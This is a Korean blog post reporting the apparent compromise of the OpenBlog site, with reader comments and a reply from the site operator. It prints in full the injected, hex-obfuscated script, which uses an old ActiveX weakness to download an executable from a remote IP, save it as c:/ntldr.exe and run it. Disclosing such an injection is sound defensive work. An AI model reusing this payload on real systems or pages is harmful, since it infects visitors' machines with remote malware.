블러그를 하던 중에 Design Liv2님의 글을 보니, 오픈블로그(www.openblog.co.kr) 사이트가 해킹된 거 같다는 글을 보았습니다.

즉시, 접속하여 확인해 보니, 탑 페이지에 iframe 명령어를 사용한 악성 코드가 삽입되어 있습니다.
사용자 삽입 이미지

해당 사이트에 접속하여 다시 소스를 보니, 익스플로잇이 실행되도록 조작되어 있습니다.
<script language=javascript>
try {
eval("\x76\x61\x72\x20\x64\x66\x20\x3D\x20\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x28\x27\x6F\x62\x6A\x65\x63\x74\x27\x29\x3B");
eval("\x64\x66\x2E\x73\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65\x28\x27\x63\x6C\x61\x73\x73\x69\x64\x27\x2C\x27\x63\x6C\x73\x69\x64\x3A\x42\x44\x39\x36\x43\x35\x35\x36\x2D\x36\x35\x41\x33\x2D\x31\x31\x44\x30\x2D\x39\x38\x33\x41\x2D\x30\x30\x43\x30\x34\x46\x43\x32\x39\x45\x33\x36\x27\x29\x3B");
eval("\x76\x61\x72\x20\x78\x50\x6F\x73\x74\x3D\x64\x66\x2E\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74\x28\x27\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x54\x54\x50\x27\x2C\x27\x27\x29\x3B");
eval("\x78\x50\x6F\x73\x74\x2E\x4F\x70\x65\x6E\x28\x27\x47\x45\x54\x27\x2C\x27\x68\x74\x74\x70\x3A\x2F\x2F\x36\x34\x2E\x33\x37\x2E\x37\x31\x2E\x39\x38\x2F\x76\x62\x73\x2E\x65\x78\x65\x27\x2C\x30\x29\x3B");
eval("\x78\x50\x6F\x73\x74\x2E\x53\x65\x6E\x64\x28\x29\x3B\x76\x61\x72\x20\x73\x47\x65\x74\x3D\x64\x66\x2E\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74\x28\x27\x41\x44\x4F\x44\x42\x2E\x53\x74\x72\x65\x61\x6D\x27\x2C\x27\x27\x29\x3B");
eval("\x73\x47\x65\x74\x2E\x4D\x6F\x64\x65\x3D\x33\x3B\x73\x47\x65\x74\x2E\x54\x79\x70\x65\x3D\x31\x3B\x73\x47\x65\x74\x2E\x4F\x70\x65\x6E\x28\x29\x3B");
eval("\x73\x47\x65\x74\x2E\x57\x72\x69\x74\x65\x28\x78\x50\x6F\x73\x74\x2E\x52\x65\x73\x70\x6F\x6E\x73\x65\x42\x6F\x64\x79\x29\x3B");
eval("\x73\x47\x65\x74\x2E\x53\x61\x76\x65\x54\x6F\x46\x69\x6C\x65\x28\x27\x63\x3A\x2F\x6E\x74\x6C\x64\x72\x2E\x65\x78\x65\x27\x2C\x32\x29\x3B");
eval("\x76\x61\x72\x20\x78\x20\x3D\x20\x64\x66\x2E\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74\x28\x27\x77\x73\x63\x72\x69\x70\x74\x2E\x73\x68\x65\x6C\x6C\x27\x2C\x27\x27\x29\x3B");
eval("\x78\x2E\x72\x75\x6E\x28\x27\x63\x3A\x2F\x6E\x74\x6C\x64\x72\x2E\x65\x78\x65\x27\x2C\x30\x29\x3B");
eval("");
}
catch (error)
{ }
</script>
<script type="text/jscript">
function init() {
document.write("Not Found");
}
window.onload = init;
</script>

최근 유행하는 공격 패턴은 ARP 스푸핑을 이용하여 조작하여 공격하는 것으로 이 중 공격 패턴은 앞서 언급한 것과 같이 탑 페이지에 익스플로잇을 통해 다른 경유서버에서 다운로드하여 실행하게 하는 방식입니다.

오픈블로그에서 빨리 조치를 취하시길... ...

reTweet
Posted by 문스랩닷컴
blog comments powered by Disqus

    댓글을 달아 주세요

    1. Favicon of http://www.dalyong.com BlogIcon 달룡.. 2007.10.05 23:33  댓글주소  수정/삭제  댓글쓰기

      한두달전에도 해킹이 되었지요..아마도 아직 그 흔적이 계속해서 남아 있는 듯합니다.

    2. Favicon of http://www.nightmemory.com BlogIcon 밤의추억 2007.10.06 00:26  댓글주소  수정/삭제  댓글쓰기

      아이고 이런 블로그 사이트들도 해킹에 공격대상이 되고 있군요. 조심해야 할듯합니다. 오픈블로그는 저도 자주 이용하는 사이트인데... 좋은 정보 감사합니다. 당분간 오픈 블로그 접속을 자제해야 할듯...

    3. Favicon of http://www.openblog.com BlogIcon 오픈블로그 2007.10.09 17:58  댓글주소  수정/삭제  댓글쓰기

      안녕하세요. 오픈블로그 담당자 입니다.

      이 문제에 대해 서버 담당자가 문제를 해결중에 있고 어느정도 해결이 된 상태입니다.

      다만 추가적으로 생길 수 있는 문제에 대해 계속 모니터링에 있습니다.

      혹시 같은 문제가 또 발생할 경우 blogmaster@mediamob.co.kr 로 제보해 주시면 감사드리겠습니다.



    Web Analytics Blogs Directory